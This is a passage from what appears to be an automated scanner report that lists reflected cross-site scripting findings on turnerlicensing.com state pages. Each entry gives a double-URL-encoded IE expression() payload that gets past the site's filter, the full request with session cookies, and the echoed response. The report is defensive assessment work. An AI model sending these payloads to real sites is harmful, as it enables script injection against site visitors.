Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:38 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1146975289:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110334


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oregon</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175671&3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1&3239c'style='x:expression(alert(1))'0a7c4969562=1&3239c%27style%3d%27x%3aexpression%28alert%281%29%29%270a7c4969562=1&fromsla=T'>
...[SNIP]...

2.223. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Ottawa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772666346:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=928
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87508


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ottawa</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=260194&885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1&885e7%27style%3d%27x%3aexpression%28alert%281%29%29%27749e6052f63=1&885e7'style='x:expression(alert(1))'749e6052f63=1&fromsla=T'>
...[SNIP]...

2.224. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Pennsylvania

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328766236:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=912
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111623


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pennsylvania</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175672&ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1&ffcbc'style='x:expression(alert(1))'ef6395e1920=1&ffcbc%27style%3d%27x%3aexpression%28alert%281%29%29%27ef6395e1920=1&fromsla=T'>
...[SNIP]...

2.225. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Rhode-Island

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1590878181:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 60061


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Rhode Island</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
nsing.com/s.nl?sc=77&category=175740&a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1&a84dc%27style%3d%27x%3aexpression%28alert%281%29%29%2717befc6fc54=1&fromsla=T&a84dc'style='x:expression(alert(1))'17befc6fc54=1'>
...[SNIP]...

2.226. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/South-Carolina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:40 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -259173507:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110580


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>South Carolina</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175742&62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1&62e79%27style%3d%27x%3aexpression%28alert%281%29%29%27dc0d0d2a4ae=1&62e79'style='x:expression(alert(1))'dc0d0d2a4ae=1&fromsla=T'>
...[SNIP]...

2.227. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/South-Dakota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:29 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -259176447:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=966
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54518


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>South Dakota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
censing.com/s.nl?sc=77&category=175745&29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1&29abe%27style%3d%27x%3aexpression%28alert%281%29%29%27456eef5a39=1&fromsla=T&29abe'style='x:expression(alert(1))'456eef5a39=1'>
...[SNIP]...

2.228. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Tennessee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -109242345:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=812
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110772


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tennessee</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175746&a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1&a95b2'style='x:expression(alert(1))'349b7eab0ec=1&a95b2%27style%3d%27x%3aexpression%28alert%281%29%29%27349b7eab0ec=1&fromsla=T'>
...[SNIP]...

2.229. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Texas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CT